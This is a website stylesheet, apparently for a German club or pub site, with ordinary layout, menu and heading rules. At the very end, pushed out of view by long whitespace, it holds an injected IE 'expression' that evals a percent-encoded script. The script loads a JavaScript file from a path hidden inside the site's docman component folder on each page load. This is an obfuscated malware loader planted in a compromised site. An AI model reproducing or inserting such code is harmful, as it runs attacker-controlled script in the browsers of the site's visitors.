BODY {

	position: relative;

	margin: 10px auto 0px auto;

	font: 75% Arial;

	width: 770px;

	line-height: 1.4em;

	color: #666666;

	height: 100%;

	text-align: left;

	vertical-align: center;

	text-decoration: none;

}

img {

	border: 0;

	margin-left: 10px;

	margin-right: 10px;

}

ul {

	margin-left: 20px;

	list-style: none;

}

#kneipe {

	border: 0px;

	padding: 0px;

	margin: 0px;

	padding-right: 20px;

}

#kneiphead {

	font-style: bold;

	font-size: 14px;

}

#band {

	border: 0;

	margin: 0;

}

#bg {

	background-image:url(images/bg.jpg); 

	background-repeat: no-repeat;

}

#bg2 {

	background-image:url(images/band.jpg); 

	background-repeat: no-repeat;

}

#bg3 {

	background-image:url(images/bgwappen.jpg); 

	background-repeat: no-repeat;

}

#bg4 {

	background-image:url(images/bgrad.jpg); 

	background-repeat: no-repeat;

}



#left {

	width: 140px;

	float: left;

	position: relative;

}

#right {

	font: Arial;

	width: 580px;

	float: right;

	position: relative;

	padding-left: 20px;

	padding-right: 9px;

	text-align: justify;

	border-left: 1px dotted #FF0000;

}

#menu ul li a, #menu ul li li {

	display: block;

	padding-left: 0px;

	padding-top: 5px;

	text-align: left;

	text-decoration: none;

	border-bottom: 1px dotted #FF0000;

	color: #666666;

	height: 1.4em;

	margin: 0px;

}

#menu ul {

	margin: 0;

	padding-left: 15px;

	padding-bottom: 5px;

}

#menu ul li a:hover {

	font-weight: bold;

}

#menu ul li {

	list-style: none;

}

#menu2 a {

	border-bottom: none;

	display: block;

	border-bottom: none;

	margin: 0px;

	padding: 0px

	padding-bottom: 3px;

	padding-left: 15px;

	text-align: left;

	text-decoration: none;

	color: #666666;

	height: 1.4em;

	font-size: 11px;

}

#menu2 a:hover {

	text-decoration: underline;

}

#hnavbg {

	z-index: 1;

	width: 580px;

	background-color: #FF0000;

	color: #FF0000;

	margin: 0;

	padding: 0;

}

#hnav table {

	position: absolute;	

	top: 55px;

	z-index: 2;

	width: 570px;

	margin: 0;

	margin-left: 3px;

}

#hnav tr a, #hnav tr td{

	background-color: #CCCCCC;

	padding: 0;

	padding-left: 3px;

}

#tableh  {

	position: absolute;

	top: 65px;

	width: 570px;

	text-decoration: none;

	font-size: 1em;

	margin-top: 25px;

	color: #336633;

	padding-left: 5px;

	border-left: 5px solid #FF0000;

	border-bottom: 1px dotted #FF0000;

}

#tdleft {

	padding: 5px;

	background-color: silver;

	color: #666666;

	width: 130px;

	vertical-align: top;

	margin-left: 0;

	text-align: right;

}

#tdright {

	padding: 5px;

	color: #666666;

	width: 450px;

	vertical-align: top;

	border-bottom: dotted 1px;

}

#imgdes {

	font: 75% Arial;

	text-align: center;

}

#umbau {

	font: 75% Arial;

	text-align: center;

}

#umbau td {

	background-color: #EBEBEB;

	width: 250px;

}

#umbau img {

	padding: 0px;

	margin: 0px;

}

#chargen {

	font: 75% Arial;

	text-align: center;

}

#chargen td {

	background-color: #EBEBEB;

	width: 250px;

}

#sk td {

	vertical-align: top;

}



h1  {	

	text-decoration: none;

	font-size: 1.4em;

	font-weight: bold;

	letter-spacing: 0px;

	margin-top: 20px;

	border-left: 5px solid #FF0000;

	padding-left: 5px;

	padding-right: 0;

	padding-bottom: 3px;

	border-bottom: 1px dotted #333333;

	color: #333333;

}

h2  {	

	text-decoration: none;

	font-size: 1em;

	margin-top: 25px;

	color: #333333;

	padding-left: 5px;

	border-left: 5px solid #FF0000;

	border-bottom: 1px dotted #FF0000;

}

m1 {

		font-weight: bold;

		text-decoration: none;

		color: #FF0000;

}

#right a:link {

		font-weight: bold;

		text-decoration: none;

		color: #FF0000;

}



#right a:hover, #right a:active, #right a:visited {

		font-weight: bold;

		text-decoration: none;

		color: #FF0000;

}

#hnav a:link {

		font-weight: bold;

		text-decoration: none;

		color: #FF0000;

}



#hnav a:hover, #right a:active, #right a:visited {

		font-weight: bold;

		text-decoration: none;

		color: #FF0000;

}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%32%38%34%39%36%30%3B%20%4A%53%53%33%20%3D%20%27%2F%76%65%72%65%69%6E%2F%63%6F%6D%70%6F%6E%65%6E%74%73%2F%63%6F%6D%5F%64%6F%63%6D%61%6E%2F%74%68%65%6D%65%73%2F%64%65%66%61%75%6C%74%2F%69%6D%61%67%65%73%2F%75%76%61%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%76%65%72%65%69%6E%2F%63%6F%6D%70%6F%6E%65%6E%74%73%2F%63%6F%6D%5F%64%6F%63%6D%61%6E%2F%74%68%65%6D%65%73%2F%64%65%66%61%75%6C%74%2F%69%6D%61%67%65%73%2F%75%76%61%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































